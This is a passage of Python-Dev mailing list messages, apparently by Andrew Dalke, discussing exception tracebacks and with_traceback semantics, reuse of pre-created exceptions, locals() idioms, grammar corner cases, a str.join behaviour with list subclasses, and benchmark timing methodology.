> find.

As I also documented, Twisted tosses a lot of the call stack. Here is the
complete and full error message I got:

    Error: [Failure instance: Traceback (failure with no frames):
    twisted.internet.error.ConnectionRefusedError: Connection was refused
    by other side: 22: Invalid argument. ]

I wrote the essay at

  http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

to, among other things, show just how hard it is to figure things out in
Twisted.

> For any bug which causes something to be set up incorrectly and only
> later manifests as a traceback, I would posit that whether there is 1 frame or
> 12, you aren't going to get anything useful out of the traceback.

I posit that tracebacks are useful. Consider:

    def blah():
        make_network_request("A")
        make_network_request("B")

where "A" and "B" are encoded as part of a HTTP POST payload to the same
URI. If there's an error in the network connection - eg, the implementation
for "B" on the server dies so the connection closes w/o a response - then
knowing that the call for "B" failed and not "A" is helpful during
debugging. The low-level error message cannot report that.

Yes, I could put my own try blocks around everything and contextualize all
of the error messages so they are semantically correct for the given level
of code. But that would be a lot of code, hard to test, and not cost
effective.

> Standard practice here is just to make exception text informative,
> I think,

If you want to think of it as "exception text" then consider that the stack
trace is "just" more text for the message.

> but this is another general problem with Python programs
> and event loops, not one specific to either Twisted itself or the
> particular APIs Twisted exposes.

The thread is "Twisted Isn't Specific", as a branch of a discussion on
microthreads in the standard library. As someone experimenting with
Stackless and how it can be used on top of an async library, I feel
competent enough to comment on the latter topic. As someone who has seen
the reverse Bozo bit set by Twisted people on everyone who makes the
slightest comment towards using any other async library, and has documented
evidence as to just why one might do so, I also feel competent enough to
comment on the branch topic.

My belief is that there are too many levels of genericity in Twisted. This
makes it hard for an outsider to come in and use the system. By "use" I
include 1) understanding how the parts go together, 2) diagnosing problems
and 3) adding new features that Twisted doesn't support. Life is
trade-offs. A Twisted trade-off is genericity at the cost of
understandability. Remember, this is all my belief, backed by examples
where I did try to understand.

My experience with other networking packages has been much easier,
including with asyncore and Allegra. They are not as general purpose, but
it's hard for me to believe the extra layers in Twisted are needed to get
that extra whatever functionality.

My other belief is that async programming is hard for most people, who
would rather do "normal" programming instead of "inside-out" programming.
Because of this 2nd belief I am interested in something like Stackless on
top of an async library.

> As a personal anecdote, I've never once had to chase a bug through any of the
> 6 "generic calls" singled out. I can't think of a case where I've helped any
> one else who had to do this, either. That part of Twisted is very old, it is
> _very_ close to bug-free, and application code doesn't have very much control
> over it at all. Perhaps in order to avoid scaring people, there should be a
> way to elide frames from a traceback (I don't much like this myself, I worry
> about it going wrong and chopping out too much information, but I have heard
> other people ask for it)?

Even though I said some of this earlier I'll elaborate for clarification.
The specific bug I was tracking down had *no* traceback. There w
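[A quick illustration, not from the original message, of the "contextualize
every call" approach dismissed above as too much boilerplate. RequestError
and make_network_request are hypothetical names carried over from the blah()
example; the stub exists only so the sketch runs on its own.]

    class RequestError(Exception):
        pass

    def make_network_request(payload):
        # Stand-in for the real network call; always fails, to show the effect.
        raise RequestError("connection closed without a response")

    def blah():
        # Wrapping each call by hand so the error says *which* request failed.
        # Doing this around every call in a real program is the "lot of code,
        # hard to test" burden described above.
        try:
            make_network_request("A")
        except RequestError, err:
            raise RequestError("while sending request A: %s" % err)
        try:
            make_network_request("B")
        except RequestError, err:
            raise RequestError("while sending request B: %s" % err)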
[Python-Dev] with_traceback
Guido's talk at PyCon said:
> Use raise E(arg).with_traceback(tb)
> instead of raise E, arg, tb

That seems strange to me because of the mutability. Looking through the
back discussions on this list I see Guido commented:

  http://mail.python.org/pipermail/python-3000/2007-February/005689.html
> Returning the mutated object is acceptable here
> because the *dominant* use case is creating and raising an exception
> in one go:
>
> raise FooException().with_traceback()

The 3 argument raise statement is rarely used, in my experience. I believe
most don't even know it exists, excepting mostly advanced Python
programmers and language lawyers.

My concern when I saw Guido's keynote was the worry that people do/might
write code like this

    NO_END_OF_RECORD = ParserError("Cannot find end of record")

    def parse_record(input_file):
        ...
        raise NO_END_OF_RECORD
        ...

That is, create instances at the top of the module, to be used later. This
code assumes that the NO_END_OF_RECORD exception instance is never
modified. If the traceback is added to its __traceback__ attribute then I
see two problems if I were to write code like the above:
  - the traceback stays around "forever"
  - the code is no longer thread-safe.

As an example of code which is affected by this, see pyparsing, which has
code that looks like

    class Token(ParserElement):
        """Abstract ParserElement subclass, for defining atomic matching
        patterns."""
        def __init__( self ):
            super(Token,self).__init__( savelist=False )
            self.myException = ParseException("",0,"",self)

    class Literal(Token):
        def parseImpl( self, instring, loc, doActions=True ):
            if (instring[loc] == self.firstMatchChar and
                (self.matchLen==1 or instring.startswith(self.match,loc)) ):
                return loc+self.matchLen, self.match
            #~ raise ParseException( instring, loc, self.errmsg )
            exc = self.myException
            exc.loc = loc
            exc.pstr = instring
            raise exc

The "Literal" and other token classes are part of the grammar definition
and usually exist in module scope.

There's another question I came up with. If the exception already has a
__traceback__, will that traceback be overwritten if the instance is
reraised? Consider this code, loosely derived from os._execvpe

    import os, sys

    _PATH = ["here", "there", "elsewhere"]

    def open_file_on_path(name):
        # If nothing exists, raises an exception based on the
        # first attempt
        saved_err = None
        saved_tb = None
        for dirname in _PATH:
            try:
                return open(os.path.join(dirname, name))
            except Exception, err:
                if not saved_err:
                    saved_err = err
                    saved_tb = sys.exc_info()[2]
        raise saved_err.__class__, saved_err, saved_tb

    open_file_on_path("spam")

which generates this

    Traceback (most recent call last):
      File "raise.py", line 19, in <module>
        open_file_on_path("spam")
      File "raise.py", line 11, in open_file_on_path
        return open(os.path.join(dirname, name))
    IOError: [Errno 2] No such file or directory: 'here/spam'

What is the correct way to rewrite this for use with "with_traceback"? Is
it

    def open_file_on_path(name):
        # If nothing exists, raises an exception based on the
        # first attempt
        saved_err = None
        for dirname in _PATH:
            try:
                return open(os.path.join(dirname, name))
            except Exception, err:
                if not saved_err:
                    saved_err = err
                    saved_tb = sys.exc_info()[2]
        raise saved_err.with_traceback(saved_err.__traceback__)

One alternative, btw, is

    raise saved_err.with_traceback()

to have it use the existing __traceback__ (and raising its own exception if
__traceback__ is None?)

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] with_traceback
PJE:
> Then don't do that, as it's bad style for Python 3.x. ;-)

It's bad style for 3.x only if Python goes with this interface. If it stays
with the 2.x style then there's no problem. There may also be solutions
which are cleaner and which don't mutate the exception instance. I am not
proposing such a syntax. I have ideas, but I am not a language designer and
have long given up the idea that I might be good at it.

> This does mean you won't be able to port your code to 3.x style until
> you've gotten rid of shared exception instances from all your dependencies,
> but 3.x porting requires all your dependencies to be ported anyway.

What can be done to minimize the number of dependencies which need to be
changed?

> It should be sufficient in both 2.x and 3.x for with_traceback() to raise
> an error if the exception already has a traceback -- this should catch any
> exception instance reuse.

That would cause a problem in my example where I save then reraise the
exception, as

    raise saved_err.with_traceback(saved_err.__traceback__)

> > What is the correct way to rewrite this for use
> > with "with_traceback"? Is it [...]
>
> No, it's more like this:
>
>     try:
>         for dirname in ...
>             try:
>                 return ...
>             except Exception as err:
>                 saved_err = err
>         raise saved_err
>     finally:
>         del saved_err

I don't get it. The "saved_err" has a __traceback__ attached to it, and is
reraised. Hence it gets the old stack, right?

Suppose I wrote

    ERR = Exception("Do not do that")

    try:
        f(x)
    except Exception:
        raise ERR

    try:
        f(x*2)
    except Exception:
        raise ERR

Yes it's bad style, but people will write it. The ERR gets the traceback
from the first time there's an error, and that traceback is locked in ...
since raise won't change the __traceback__ if one exists. (Based on what
you said it does.)

> I've added the outer try-finally block to minimize the GC impact of the
> *original* code you showed, as the `saved_tb` would otherwise have created
> a cycle. That is, the addition is not because of the porting, it's just
> something that you should've had to start with.

Like I said, I used code based on os._execvpe. Here's the code

    saved_exc = None
    saved_tb = None
    for dir in PATH:
        fullname = path.join(dir, file)
        try:
            func(fullname, *argrest)
        except error, e:
            tb = sys.exc_info()[2]
            if (e.errno != ENOENT and e.errno != ENOTDIR
                    and saved_exc is None):
                saved_exc = e
                saved_tb = tb
    if saved_exc:
        raise error, saved_exc, saved_tb
    raise error, e, tb

I see similar use in atexit._run_exitfuncs, though as Python is about to
exit it won't make a real difference. doctest shows code like

    >>> exc_info = failure.exc_info
    >>> raise exc_info[0], exc_info[1], exc_info[2]

SimpleXMLRPCServer does things like

    except:
        # report exception back to server
        exc_type, exc_value, exc_tb = sys.exc_info()
        response = xmlrpclib.dumps(
            xmlrpclib.Fault(1, "%s:%s" % (exc_type, exc_value)),
            encoding=self.encoding, allow_none=self.allow_none,
            )

I see threading.py gets it correctly. My point here is that most Python
code which uses the traceback term doesn't break the cycle, so it must be
caught by the gc. While there might be a more correct way to do it, it's
too complicated for most to get it right.

> Anyway, the point here is that in 3.x style, most uses of 3-argument raise
> just disappear altogether. If you hold on to an exception instance, you
> have to be careful about it for GC, but no more so than in current Python.

Where people already make a lot of mistakes. But my concern is not in the
gc, it's in the mutability of the exception causing hard-to-track-down
problems in code which is written by beginning to intermediate users.

> The "save one instance and use it forever" use case is new to me - I've
> never seen nor written code that uses it before now. It's definitely
> incompatible with 3.x style, though.

I pointed out an example in pyparsing. Thomas W. says he's seen other code.
I've been looking for another real example but as this is relatively
uncommon code, I don't have a wide enough corpus for the search. I also
don't know of a good tool for searching for this sort of thing. (Eg,
www.koders.com doesn't help.)

It's a low probability occurrence. So is the use of the 3 arg raise. Hence
it's hard to get good intuition about problems which might arise.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] with_traceback
Glyph:
> This seems like kind of a strange micro-optimization to have an impact
> on a language change discussion.

Just as a reminder, my concern is that people reuse exceptions (rarely) and
that the behavior of the "with_traceback()" method is ambiguous when that
happens. It has nothing to do with optimization.

The two solutions of:
  1. always replace an existing __traceback__
  2. never replace an existing __traceback__
both seem to lead to problems. Here are minimal examples for thought:

    # I know PJE says this is bad style for 3.0. Will P3K help
    # identify this problem? If it's allowable, what will it do?
    # (Remember, I found existing code which reuses exceptions
    # so this isn't purely theoretical, only rare.)
    BAD = Exception("that was bad")

    try:
        raise BAD
    except Exception:
        pass

    raise BAD   # what traceback will be shown here?

(Oh, and what would a debugger report?)

    # 2nd example; reraise an existing exception instance.
    # It appears that any solution which reports a problem
    # for #1 will not allow one or both of the following.
    try:
        raise Exception("bad")
    except Exception as err:
        first_err = err

    try:
        raise Exception("bad")
    except Exception:
        raise first_err   # what traceback will be shown here?

    # 3rd example, like the 2nd but end it with
        raise first_err.with_traceback(first_err.__traceback__)
    # what traceback will be shown here?

> I'm sorry if this has been proposed already in this discussion (I
> searched around but did not find it),

I saw references to a PEP about it but could not find the PEP. Nor could I
find much discussion either. I would like to know the details.

I assume that "raise" adds the __traceback__ if it's not None, hence
there's no way it can tell if the __traceback__ on the instance was created
with "with_traceback()", from an earlier "raise", or from the
with_traceback. But in the current examples it appears that the Exception
class could attach a traceback during instantiation and "with_traceback"
simply replaces that. I doubt this version, but cannot be definitive.

While a variant method/syntax may improve matters, I think people will
write code as above -- all of which is valid Python 2.x and 3.x -- and end
up with strange and hard to interpret tracebacks.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] with_traceback
On 2/28/07, James Y Knight <[EMAIL PROTECTED]> wrote:
> It seems to me that a stack trace should always be attached to an
> exception object at creation time of the exception, and never at any
> other time. Then, if someone pre-creates an exception object, they
> get consistent and easily explainable behavior (the traceback to the
> creation point). The traceback won't necessarily be *useful*, but
> presumably someone pre-creating an exception object did so to save
> run-time, and creating the traceback is generally very expensive, so
> doing that only once, too, seems like a win to me.

The only example I found in about 2 dozen packages where the exception was
precreated was in pyparsing. I don't know the reason why it was done that
way, but I'm certain it wasn't for performance. The exception is created as
part of the format definition. In that case, if the traceback is important
then it's important to know which code was attempting the parse. The format
definition was almost certainly done at module import time.

In any case, reraising the same exception instance is a rare construct in
current Python code. PJE had never seen it before. It's hard to get a good
intuition from zero data points. :)
Re: [Python-Dev] with_traceback
On 3/1/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> Since by far the most common use case is to create the
> exception in the raise statement, the behavior there won't be any
> different than it is today; the traceback on precreated objects will
> be useless, but folks who precreate them for performance reasons
> presumably won't care; and those that create global exception
> instances by mistakenly copying the wrong idiom, well, they'll learn
> quickly (and a lot more quickly than when we try to override the
> exception).

Here are a few more examples of code which don't follow the idiom

    raise ExceptionClass(args)

Zope's ZConfig/cmdline.py

    def addOption(self, spec, pos=None):
        if pos is None:
            pos = "", -1, -1
        if "=" not in spec:
            e = ZConfig.ConfigurationSyntaxError(
                "invalid configuration specifier", *pos)
            e.specifier = spec
            raise e

The current xml.sax.handler.ErrorHandler includes

    def error(self, exception):
        "Handle a recoverable error."
        raise exception

    def fatalError(self, exception):
        "Handle a non-recoverable error."
        raise exception

and is used like this in xml.sax.expatreader.ExpatParser.feed

    try:
        # The isFinal parameter is internal to the expat reader.
        # If it is set to true, expat will check validity of the entire
        # document. When feeding chunks, they are not normally final -
        # except when invoked from close.
        self._parser.Parse(data, isFinal)
    except expat.error, e:
        exc = SAXParseException(expat.ErrorString(e.code), e, self)
        # FIXME: when to invoke error()?
        self._err_handler.fatalError(exc)

Note that the handler may decide to ignore the exception, based on which
error occurred. The traceback should show where in the handler the
exception was raised, and not the point at which the exception was created.

ZODB/Connection.py:

    ...
    if isinstance(store_return, str):
        assert oid is not None
        self._handle_one_serial(oid, store_return, change)
    else:
        for oid, serial in store_return:
            self._handle_one_serial(oid, serial, change)

    def _handle_one_serial(self, oid, serial, change):
        if not isinstance(serial, str):
            raise serial
        ...

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Another traceback idea [was: except Exception as err, tb]
On 3/2/07, Greg Ewing <[EMAIL PROTECTED]> wrote:
> This has given me another idea:
...
> Now, I'm not proposing that the raise statement should
> actually have the above syntax -- that really would be
> a step backwards. Instead it would be required to have
> one of the following forms:
>
>     raise ExceptionClass
>
> or
>
>     raise ExceptionClass(args)
>
> plus optional 'with traceback' clauses in both cases.
> However, the apparent instantiation call wouldn't be
> made -- it's just part of the syntax.

Elsewhere here I listed several examples of existing code which raises an
instance which was caught or created earlier. That would not be supported
if the raise had to be written in your given forms.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] PEP 344 (was: with_traceback)
On 3/2/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> So, despite the existence of libraries that pre-create exceptions, how
> bad would it really be if we declared that use unsafe? It wouldn't be
> hard to add some kind of boobytrap that goes off when pre-created
> exceptions are raised multiple times. If this had always been the
> semantics I'm sure nobody would have complained and I doubt that it
> would have been a common pitfall either (since if it doesn't work,
> there's no bad code abusing it, and so there are no bad examples that
> newbies could unwittingly emulate).

Here's code from os._execvpe which reraises an exception instance that was
created earlier

    saved_exc = None
    saved_tb = None
    for dir in PATH:
        fullname = path.join(dir, file)
        try:
            func(fullname, *argrest)
        except error, e:
            tb = sys.exc_info()[2]
            if (e.errno != ENOENT and e.errno != ENOTDIR
                    and saved_exc is None):
                saved_exc = e
                saved_tb = tb
    if saved_exc:
        raise error, saved_exc, saved_tb
    raise error, e, tb

Would the boobytrap go off in this case? I think it would, because
"saved_exc" is raised twice.

Andrew
[EMAIL PROTECTED]
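[For illustration only, not from the original message: the kind of
"boobytrap" under discussion could look roughly like the hypothetical check
below. This is a sketch of the idea, not how any Python version actually
behaves.]

    def guarded_raise(exc):
        # Hypothetical helper: refuse to re-raise an exception instance that
        # already carries a traceback from an earlier raise.
        if getattr(exc, "__traceback__", None) is not None:
            raise RuntimeError("pre-created exception %r raised a second time"
                               % exc)
        raise exc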
Re: [Python-Dev] Performance of pre-creating exceptions?
On 3/2/07, Adam Olsen <[EMAIL PROTECTED]> wrote: > We can get more than half of the benefit simply by using a default > __init__ rather than a python one. If you need custom attributes but > they're predefined you could subclass the exception and have them as > class attributes. Given that, is there really a need to pre-create > exceptions? The only real world example of (re)using pre-computed exceptions I found was in pyparsing. Here are two examples: def parseImpl( self, instring, loc, doActions=True ): if (instring[loc] == self.firstMatchChar and (self.matchLen==1 or instring.startswith(self.match,loc)) ): return loc+self.matchLen, self.match #~ raise ParseException( instring, loc, self.errmsg ) exc = self.myException exc.loc = loc exc.pstr = instring raise exc (The Token's constructor is class Token(ParserElement): def __init__( self ): super(Token,self).__init__( savelist=False ) self.myException = ParseException("",0,"",self) and the exception class uses __slots__ thusly: class ParseBaseException(Exception): """base exception class for all parsing runtime exceptions""" __slots__ = ( "loc","msg","pstr","parserElement" ) # Performance tuning: we construct a *lot* of these, so keep this # constructor as small and fast as possible def __init__( self, pstr, loc, msg, elem=None ): self.loc = loc self.msg = msg self.pstr = pstr self.parserElement = elem so you can see that each raised exception modifies 2 of the 4 instance variables in a ParseException.) -and- # this method gets repeatedly called during backtracking with the same arguments - # we can cache these arguments and save ourselves the trouble of re-parsing # the contained expression def _parseCache( self, instring, loc, doActions=True, callPreParse=True ): lookup = (self,instring,loc,callPreParse) if lookup in ParserElement._exprArgCache: value = ParserElement._exprArgCache[ lookup ] if isinstance(value,Exception): if isinstance(value,ParseBaseException): value.loc = loc raise value return value else: try: ParserElement._exprArgCache[ lookup ] = \ value = self._parseNoCache( instring, loc, doActions, callPreParse ) return value except ParseBaseException, pe: ParserElement._exprArgCache[ lookup ] = pe raise The first definitely has the look of a change for better performance. I have not asked the author nor researched to learn how much gain there was with this code. Because the saved exception is tweaked each time (hence not thread-safe), your timing tests aren't directly relevant as your solution of creating the exception using the default constructor then tweaking the instance attributes directly would end up doing 4 setattrs instead of 2. % python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try: raise e' 'except: pass' 100 loops, best of 10: 1.55 usec per loop % python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try: e.x=1;e.y=2;raise e' 'except: pass' 100 loops, best of 10: 1.98 usec per loop so 4 attributes should be about 2.5usec, or 25% slower than 2 attributes. There's also a timing difference between looking for the exception class name in module scope vs. using self.myException I've tried to find other examples but couldn't in the 20 or so packages I have on my laptop. I used searches like # find module variables assigned to exception instances egrep "^[a-z].*=.*Error\(" *.py egrep "^[a-z].*=.*Exception\(" *.py # find likely instances being raised grep "^ *raise [a-z]" *.py # find likely cases of 3-arg raises grep "^ *raise .*,.*," *.py to find candidates. Nearly all false positives. 
Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] locals(), closures, and IronPython...
On 3/5/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> I don't know too many good use cases for
> locals() apart from "learning about the implementation" I think this
> might be okay.

Since I'm watching this list for any discussion on the traceback threads,
I figured I would point out that the most common use I know for locals()
is in string interpolation when there are many local variables, eg:

    a = "spam"
    b = "egg"
    ...
    y = "foo"
    z = "bar"
    print fmtstr % locals()

The next most common is to deal with a large number of input parameters,
as in this from decimal.py:

    def __init__(self, prec=None, rounding=None, traps=None, flags=None,
                 _rounding_decision=None, Emin=None, Emax=None,
                 capitals=None, _clamp=0, _ignored_flags=None):
        ...
        for name, val in locals().items():
            if val is None:
                setattr(self, name, _copy.copy(getattr(DefaultContext, name)))
            else:
                setattr(self, name, val)

and this example based on a post of Alex Martelli's:

    def __init__(self, fee, fie, foo, fum):
        self.__dict__.update(locals())
        del self.self

In both cases they are shortcuts to "reduce boilerplate". I've more often
used the first form in my code. If an inner locals() returned a superset
of the items it returns now, I would not be concerned.

I've rarely used the 2nd form in my code. The only way I can see there
being a problem is if a function defines a class which then uses the
locals() trick, because

    >>> def blah():
    ...     a = 6; b = 7
    ...     class XYZ(object):
    ...         def __init__(self):
    ...             c = a
    ...             print "in the class", locals()
    ...     print "in the function", locals()
    ...     XYZ()
    ...
    >>> blah()
    in the function {'a': 6, 'XYZ': <class '__main__.XYZ'>, 'b': 7}
    in the class {'a': 6, 'c': 6, 'self': <__main__.XYZ object at 0x72ad0>}

the code in the class's initializer will see more locals. I've never seen
code like this (a class defined in a function, with __init__ using
locals()) and it's not something someone would write thinking it was a
standard way of doing things.

In both cases I'm not that bothered if the behavior is implementation
specific. Using locals() has the feel of being too much like a trick to
get around having to type so much. That's what editor macros are for :)

Andrew
[EMAIL PROTECTED]
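A runnable toy version of the first idiom, with made-up names, for anyone
who hasn't run into it:

    def report():
        first = "spam"
        last = "bar"
        count = 3
        # locals() hands the format operation a dict of all the local names
        fmtstr = "%(count)d items, from %(first)s to %(last)s"
        print fmtstr % locals()

    report()    # prints: 3 items, from spam to bar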
Re: [Python-Dev] locals(), closures, and IronPython...
On 3/6/07, Mike Klaas <[EMAIL PROTECTED]> wrote:
> There's nothing quite like running help(func) and getting *args,
> **kwargs as the documented parameter list.

I think

    >>> import resource
    >>> help(resource.getpagesize)
    Help on built-in function getpagesize in module resource:

    getpagesize(...)

is pretty close. :)

Andrew
[EMAIL PROTECTED]
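A small illustration of the complaint, using an invented wrapper:

    def add(a, b):
        "Add two numbers."
        return a + b

    def traced(func):
        # A typical forwarding wrapper: the real signature disappears.
        def wrapper(*args, **kwargs):
            print "calling", func.__name__
            return func(*args, **kwargs)
        wrapper.__doc__ = func.__doc__
        wrapper.__name__ = func.__name__
        return wrapper

    add = traced(add)
    help(add)     # documents the parameters as (*args, **kwargs)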
[Python-Dev] small Grammar questions
I'm finishing up a PLY lexer and parser for the current CVS version of the
Python grammar. As part of it I've been testing a lot of dark corners in
the grammar definition and implementation. Python 2.5 has some small and
rare problems which I'm pleased to note have been pretty much fixed in
Python 2.6.

I have two questions about the grammar definition. Here's a difference
between 2.5 and 2.6:

    % cat x.py
    c = "This is 'c'"
    def spam((a) = c):
        print a
    spam()
    % python2.5 x.py
    This is 'c'
    % python2.6 x.py
      File "x.py", line 2
        def spam((a) = c):
    SyntaxError: non-default argument follows default argument

I don't understand why that's changed. This shouldn't be a SyntaxError,
and there is no non-default argument following the default argument.
Note that this is still valid:

    >>> def spam((a,) = c):
    ...     pass
    ...

I think 2.6 is incorrect. According to the documentation at
http://docs.python.org/ref/function.html

    defparameter ::= parameter ["=" expression]
    sublist      ::= parameter ("," parameter)* [","]
    parameter    ::= identifier | "(" sublist ")"
    funcname     ::= identifier

My second question is about trailing commas in list comprehensions. I
don't understand why the commented-out line is not allowed:

    [x for x in 1]
    #[x for x in 1,]     # This isn't legal
    [x for x in 1,2]
    [x for x in 1,2,]
    [x for x in 1,2,3]

The Grammar file says

    # Backward compatibility cruft to support:
    # [ x for x in lambda: True, lambda: False if x() ]
    # even while also allowing:
    # lambda x: 5 if x else 2
    # (But not a mix of the two)
    testlist_safe: old_test [(',' old_test)+ [',']]

but if I change it to also allow

    testlist_safe: old_test ','

then PLY still doesn't report any ambiguities in the grammar, and I can't
find an expression that exhibits a problem. Could someone here enlighten
me?

Andrew
[EMAIL PROTECTED]
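A quick way to probe which of these forms the CPython compiler accepts,
without writing files (just a throwaway check, not part of the PLY work):

    tests = [
        "[x for x in 1]",
        "[x for x in 1,]",
        "[x for x in 1,2]",
        "[x for x in 1,2,]",
        "[x for x in 1,2,3]",
    ]
    for src in tests:
        try:
            compile(src, "<test>", "eval")
            print src, "-> accepted"
        except SyntaxError, err:
            print src, "-> SyntaxError:", err.msg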
Re: [Python-Dev] small Grammar questions
On Feb 19, 2008 1:38 PM, Andrew Dalke <[EMAIL PROTECTED]> wrote:
> def spam((a) = c):
>     print a

On Feb 20, 2008 12:29 AM, Brett Cannon <[EMAIL PROTECTED]> wrote:
> The error might be odd, but I don't see why that should be allowed
> syntax. Having a parameter surrounded by a parentheses like that makes
> no sense in a context of a place where arbitrary expressions are not
> allowed.

I'm fine with that. This is a corner that no one but language lawyers will
care about. The thing is, the online documentation and the Grammar file
allow it, as did Python 2.5. In any case, the error message is not helpful.

> From what I can tell the grammar does not prevent it. But it is
> possible that during AST creation or bytecode compilation a specific
> check is made that is throwing the exception...

In my code it's during AST generation... Your pointer to ast.c:672 was
helpful. It's stuff jeremy.hylton did in r54415. Now I have to figure out
how Python's internal ASTs work, which might take a while.

> Are you asking why the decision was made to make the expression
> illegal, or why the grammar is flagging it is wrong?

Why it's illegal. Supporting a comma doesn't seem to make anything
ambiguous, but PLY's LALR(1) might handle things that Python itself
doesn't, and I don't have the experience to tell.

There are other places where the grammar definition allows syntax that is
rejected later on. Those I can justify by saying it's easier to define the
grammar that way (hence f(1+1=2) is legal grammar but illegal Python), or
to produce better error messages (like "from .a import *"). But this one
prohibiting [x for x in 1,] I can't figure out.

Andrew
[EMAIL PROTECTED]
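One way to check that the rejection happens while the AST is being built,
not during bytecode compilation, is to ask compile() for only the AST;
this sketch assumes the _ast module's PyCF_ONLY_AST flag:

    import _ast

    src = "def spam((a) = c):\n    print a\n"
    try:
        compile(src, "<probe>", "exec", _ast.PyCF_ONLY_AST)
    except SyntaxError, err:
        # The error fires even though no bytecode is ever generated.
        print "rejected during AST construction:", err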
Re: [Python-Dev] small Grammar questions
Okay, my conclusion is that def f((a)=5) is wrong, and the code should be
changed to report a better error message. I'll file a bug against that.
And I'm going with Brett's suggestion that [x for x in 1,] is not
supported because it's almost certainly a programming error. I therefore
think the comment in the Grammar file is distracting. As comments can be.

On Feb 20, 2008 3:08 AM, Steve Holden <[EMAIL PROTECTED]> wrote:
> The one that surprised me was the legality of
>
>     def eggs((a, )=c):
>         pass
>
> That just seems like unpacking-abuse to me.

Yep. Here's another abuse, since I can't figure out when someone needs a
destructuring del statement.

    >>> class X(object): pass
    ...
    >>> X.a = 123
    >>> X.b = "hello"
    >>> X.c = 9.801
    >>> X.a, X.b, X.c
    (123, 'hello', 9.801)
    >>> del (X.a, (X.b, (X.c,)))
    >>> X.a, X.b, X.c
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    AttributeError: type object 'X' has no attribute 'a'
    >>>

Is this going to be possible in Python3k?

> You really *have* been poking around in little-known crevices, haven't you?

Like this bug from 2.5, fixed in 2.6:

    >>> from __future__ import with_statement
    >>> with f(x=5, 6):
    ...     pass
    ...
    ValueError: field context_expr is required for With

:)

Andrew
[EMAIL PROTECTED]
[Python-Dev] PySequence_Fast_GET_ITEM in string join
The Sourceforge tracker is kaputt so I'm sending it here, in part because
the effbot says it's interesting.

I can derive from list and override __getitem__:

    >>> class Spam(list):
    ...     def __getitem__(self, i):
    ...         print i
    ...         return 2
    ...
    >>> Spam()[1]
    1
    2
    >>> Spam()[9]
    9
    2
    >>>

Now consider the following:

    >>> class Spam(list):
    ...     def __getitem__(self, i):
    ...         print "Asking for", i
    ...         if i == 0: return "zero"
    ...         if i == 1: return "one"
    ...         raise IndexError, i
    ...
    >>> Spam()[1]
    Asking for 1
    'one'
    >>>

Spiffy! For my next trick:

    >>> "".join(Spam())
    ''
    >>>

The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i),
which likely doesn't know about my derived __getitem__.

    p = PyString_AS_STRING(res);
    for (i = 0; i < seqlen; ++i) {
        size_t n;
        item = PySequence_Fast_GET_ITEM(seq, i);
        n = PyString_GET_SIZE(item);
        memcpy(p, PyString_AS_STRING(item), n);
        p += n;
        if (i < seqlen - 1) {
            memcpy(p, sep, seplen);
            p += seplen;
        }
    }

The Unicode join has the same problem:

    >>> class Spam(list):
    ...     def __getitem__(self, i):
    ...         print "Asking for", i
    ...         if i == 0: return "zero"
    ...         if i == 1: return u"one"
    ...         raise IndexError, i
    ...
    >>> "".join(Spam())
    ''
    >>>

While if my class is not derived from list, everything is copacetic:

    >>> class Spam:
    ...     def __getitem__(self, i):
    ...         print "Asking for", i
    ...         if i == 0: return "zero"
    ...         if i == 1: return u"one"
    ...         raise IndexError, i
    ...
    >>> "".join(Spam())
    Asking for 0
    Asking for 1
    Asking for 2
    u'zeroone'
    >>>

Ditto for deriving from object:

    >>> class Spam(object):
    ...     def __getitem__(self, i):
    ...         print "Asking for", i
    ...         if i == 0: return "zero"
    ...         if i == 1: return "one"
    ...         raise IndexError, i
    ...
    >>> "".join(Spam())
    Asking for 0
    Asking for 1
    Asking for 2
    'zeroone'
    >>>

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] PySequence_Fast_GET_ITEM in string join
Me [Andrew Dalke] said:
> The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i),
> which likely doesn't know about my derived __getitem__.

Oops, I didn't know what the code was doing well enough. The relevant
call is

    seq = PySequence_Fast(orig, "");

For my derived list object that simply hands back the list itself, so the
rest of the join reads the underlying list storage directly and never
consults my overridden __getitem__. (The non-list versions are converted
by iterating over them, and a class without __iter__ falls back to the
__getitem__ protocol, which is why those do call the override.)

So things are working as designed. Well, back to blundering about. Too
much brennivin. ;)

Andrew
[EMAIL PROTECTED]
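A small follow-up experiment along the same lines: other list-consuming
operations likewise read the subclass's real storage, and only an
explicit index goes through the override.

    class Spam(list):
        def __getitem__(self, i):
            print "Asking for", i
            return "item %d" % i

    s = Spam([10, 20, 30])
    print list(s)    # [10, 20, 30] -- built from the list's own storage,
                     # the overridden __getitem__ is never consulted
    print s[1]       # prints "Asking for 1" then "item 1" -- explicit
                     # indexing does use the override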
Re: [Python-Dev] Python Benchmarks
M.-A. Lemburg:
> The approach pybench is using is as follows:
> ...
> The calibration step is run multiple times and is used to calculate
> an average test overhead time.

One of the changes that occurred during the sprint was to change this
algorithm to use the best time rather than the average. Using the average
assumes a Gaussian distribution, and timing results are not Gaussian.
There is an absolute best time, but it's rarely reached because of
background noise. The distribution is more like a gamma distribution plus
the minimum time.

To show the distribution is non-Gaussian I ran the following:

    def compute():
        x = 0
        for i in range(1000):
            for j in range(1000):
                x += 1

    def bench():
        t1 = time.time()
        compute()
        t2 = time.time()
        return t2-t1

    times = []
    for i in range(1000):
        times.append(bench())

    print times

The full distribution is attached as 'plot1.png' and the close-up (range
0.45-0.65) as 'plot2.png'. Not a clean gamma function, but that's a closer
match than an exponential.

The gamma distribution looks more like an exponential function when the
shape parameter is large. This corresponds to a large amount of noise in
the system, so the run time is not close to the best time. This means the
average approach works better when there is a lot of random background
activity, which is not the usual case when I try to benchmark.

When averaging a gamma distribution you'll end up with a bit of a skew,
and I think the skew depends on the number of samples, reaching a limit
point. Using the minimum time should be more precise because there is a
definite lower bound and the machine should be stable. In my test above
the first few results are

